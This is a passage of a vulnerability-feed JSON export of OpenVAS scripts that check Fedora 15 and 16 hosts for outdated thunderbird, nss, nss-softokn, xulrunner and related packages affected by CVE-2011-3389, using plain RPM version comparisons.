8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:55 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for thunderbird-lightning FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird-lightning\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird-lightning\", rpm:\"thunderbird-lightning~1.1~0.1.rc1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-03T10:56:34", "description": "Check for the Version of gnome-python2-extras", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-python2-extras FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:863695", "href": "http://plugins.openvas.org/nasl.php?oid=863695", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 15\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072231.html\");\n script_id(863695);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:46 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~35.fc15.4\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-03-19T00:00:00", "type": "openvas", "title": "Fedora Update for nss FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863804", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863804", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071325.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863804\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:18:59 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for nss FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"nss on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for xulrunner FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072227.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863694\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:44 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for xulrunner FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xulrunner'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"xulrunner on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~9.0.1~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863693", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863693", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072225.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863693\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:39 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n script_name(\"Fedora Update for thunderbird FEDORA-2011-17399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"thunderbird on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~9.0~4.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-03T10:58:20", "description": "Check for the Version of thunderbird", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:863916", "href": "http://plugins.openvas.org/nasl.php?oid=863916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"thunderbird on Fedora 16\";\ntag_insight = \"Mozilla Thunderbird is a standalone mail and newsgroup client.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071323.html\");\n script_id(863916);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:17 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for thunderbird FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~9.0~4.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:58:29", "description": "Check for the Version of nss-softokn", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for nss-softokn FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:863955", "href": "http://plugins.openvas.org/nasl.php?oid=863955", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-softokn FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss-softokn on Fedora 16\";\ntag_insight = \"Network Security Services Softoken Cryptographic Module\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071324.html\");\n script_id(863955);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:13 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for nss-softokn FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss-softokn\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-softokn\", rpm:\"nss-softokn~3.13.1~14.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for nss-softokn FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863955", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863955", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-softokn FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071324.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863955\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:13 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for nss-softokn FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nss-softokn'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"nss-softokn on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-softokn\", rpm:\"nss-softokn~3.13.1~14.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:57:46", "description": "Check for the Version of nss", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:863697", "href": "http://plugins.openvas.org/nasl.php?oid=863697", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss on Fedora 15\";\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to\n support cross-platform development of security-enabled client and\n server applications. Applications built with NSS can support SSL v2\n and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509\n v3 certificates, and other security standards.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072229.html\");\n script_id(863697);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:51 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for nss FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~10.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss-softokn FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863692", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863692", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-softokn FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072230.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863692\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 